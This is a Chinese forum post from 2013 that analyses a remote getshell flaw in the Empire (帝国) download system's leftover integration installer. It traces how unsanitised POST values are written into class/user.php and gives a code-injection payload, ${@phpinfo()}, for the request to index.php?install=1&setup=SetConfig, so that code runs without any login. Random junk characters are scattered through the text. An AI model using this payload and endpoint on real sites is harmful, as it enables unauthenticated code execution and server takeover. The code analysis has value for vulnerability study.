这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
* [8 p9 X/ V7 Q" C. h% a
' y' d H2 V2 Q0 b9 u( T: N) m* q: N+ N+ y' Z, T" T0 X
这是帝国的一套下载系统 如图
# G5 B/ F- m( f) aps(不需要任何账户和密码,直接写shell) , Y- x& Q) E! B# f9 w- y
由于很多站是由于下载要整合discuz 等等一些论坛....
, W6 @- f9 p v
5 _# Z( a: L% c9 B$ R: U G而帝国他又有一个万能接口,如图
8 N: c$ n8 H, y- \* S9 b$ g; u% s1 J4 Y; U
& T- p/ X3 L2 N/ ]
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码# D$ J' e- d/ @2 ~- K; b0 q" z
' p# J! Q, v$ i5 q& R, t当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
( k6 Q: Q, z& h5 L* Q' j4 [) }0 K; s6 z: X; i( [
在data/fun.php中的15行
8 `# n) Z+ \# U7 D+ A6 g/ u
, j! T, G' t1 D我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
. d& d' R' T! D9 s, G& I17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干( e" r. J. Q) B" b; P: C" \- {
( U3 l9 D9 S: V& x6 w/ T3 i$ p J这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);- _0 W$ y/ C1 ~1 j0 y4 R$ C
) I0 ?( z4 ?( s d8 Q8 d+ K7 w( u
他将传进来的变量进行了切割,然后赋给了$filetext3 V1 q# h1 B4 x/ g5 [
O6 ^3 }' R1 a5 i
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
0 ~( n9 b+ z* i6 w& L G A3 M5 e" e+ n1 I0 ~
我们看看写入的结果,随便填一个
6 J0 i/ A/ n1 e! P4 z& v. ~& Y$ D) j9 X- Y
" N9 n* v; I+ R
) y* f# s, h& H# O$ K
$ D* ?: e# v( x( ?
9 m) V; E+ z7 `4 [) T# d4 q
& \) b- p9 d, O4 ^& S
; d/ c8 {! w. K: _
; F( ~+ `( B. ^9 ]% Y
7 o( i2 x- ^4 p) ^
7 K( a5 `1 C# w! ^) m k" o8 t5 e# c% ^
9 }/ o; w" _+ ~
; E( q7 S) Z, D% B/ [6 P# ~" H7 F
2 ]& D# _+ [& ?2 X9 }
8 t* O# z2 w7 F- V6 a" d9 R+ O3 ^. @* z: d( D2 n. p* h2 U
, f# ~' C, K/ I4 c2 v* J( x; k2 V& \/ q9 _% Q" @& \; M; }4 x
0 ]$ J+ a( {1 Z
; E7 V1 `. o: B/ W; ^! M
6 x9 N! p( A" @/ }' G所以我们淫荡点,写个${@phpinfo()}试试
# I% k: l4 u! f7 R! e; D$ t- T然后访问以下class/user.php这个文件
' e P' z; { N* b日了吧
! W% z- o6 x, s5 N, j. p+ E( Y% L6 @. K, ?7 Q f6 R
4 L1 E; V) i! r" u6 x5 o9 |- e3 }* k: Y) e4 Y
! O3 \% [' M4 S8 I {$ z: W% u+ L! k1 N& e/ B# ]& k2 a8 P# L% v% ^& B
| 
发表于 2013-1-23 09:34:37
收藏
分享
支持
反对